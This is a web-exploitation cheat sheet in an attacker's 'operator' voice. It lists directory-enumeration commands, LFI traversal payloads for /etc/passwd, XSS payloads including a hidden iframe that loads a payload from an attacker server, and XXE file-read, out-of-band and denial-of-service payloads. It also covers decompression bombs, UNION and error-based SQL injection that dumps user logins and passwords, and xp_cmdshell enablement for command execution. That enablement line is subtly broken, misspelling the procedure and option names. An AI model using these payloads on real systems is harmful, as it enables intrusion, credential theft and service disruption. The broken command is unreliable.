Web Exploit#

A short tradecraft sheet for the operator working web targets. The page covers enumeration, local file inclusion, reflected and persistent cross-site scripting, XML vulnerabilities, and manual SQL injection. Payloads come straight from the field handbook, the wrappers around them are operator-voice.

Web enumeration#

Dirsearch.

$ dirsearch -u example.com -e sh,txt,htm,php,cgi,html,pl,bak,old
$ dirsearch -u example.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist
$ dirsearch -u https://example.com -e .

Dirb.

$ dirb http://target.com /path/to/wordlist
$ dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old

Gobuster.

$ gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt

Local file inclusion#

Vulnerable parameter form.

http://<target>/index.php?parameter=value

Ways to verify.

http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index
http://<target>/script.php?page=../../../../../../../etc/passwd
http://<target>/script.php?page=../../../../../../../boot.ini

LFI payload lists.

XSS reflected#

Simple tests.

<script>alert('Found')</script>
"><script>alert(Found)</script>"
<script>alert(String.fromCharCode(88,83,83))</script>

Bypass tag filtering.

" onload="alert(String.fromCharCode(88,83,83))
" onload="alert('XSS')
<img src='bla' onerror=alert("XSS")>

Persistent.

>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HELLOWORLD!</h1></div>";

Download via XSS.

<iframe src="http://OUR_SERVER_IP/PAYLOAD" height="0" width="0"></iframe>

XSS payload lists.

XML vulnerabilities#

XXE classic.

<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Windows.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

Out-of-band.

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

DoS via blocking read of /dev/random.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

Other XXE payloads.

DTD retrieval, decompression bombs (zip / gzip / LZMA), XPath injection, XInclude, and XSLT abuse round out the XML attack surface.

Decompression bomb#

$ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz
$ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy
$ ls -sh zeros.*
1020K zeros.gz
148K zeros.xy

Manual SQLi#

Quote probe.

http://<IP>/Less-1/?id=5'

Order-by fuzzing to find column count.

http://<IP>/Less-1/?id=-1 order by 1
http://<IP>/Less-1/?id=-1 order by 2
http://<IP>/Less-1/?id=-1 order by 3

Find the injectable column.

MySQL:    http://<IP>/Less-1/?id=-1 union select 1, 2, 3
Postgres: http://<IP>/Less-1/?id=-1 union select NULL, NULL, NULL

Versions and database names.

MySQL:    http://<IP>/Less-1/?id=-1 union select 1, 2, version()
Postgres: http://<IP>/Less-1/?id=-1 union select NULL, NULL, version()
MySQL:    http://<IP>/Less-1/?id=-1 union select 1, 2, database()
Postgres: http://<IP>/Less-1/?id=-1 union select NULL,NULL, database()

Current user, schemas, tables, columns, concatenate.

http://<IP>/Less-1/?id=-1 union select 1, 2, current_user()
http://<IP>/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata
http://<IP>/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"
http://<IP>/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"
http://<IP>/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;

Error-based SQLi (usually MSSQL)#

http://<IP>/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--
http://<IP>/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--
http://<IP>/Less-1/?id=-1 or db_name(0)=0 --
http://<IP>/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--

Shell out via xp_cmdshell (need sa privileges).

EXEC master..xp_cmdshell <command>

Enable shell commands.

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;

Online tool#

Unfurl takes a URL and expands (“unfurls”) it into a directed graph, extracting every bit of information from the URL and exposing what is obscured. https://dfir.blog/unfurl/

References#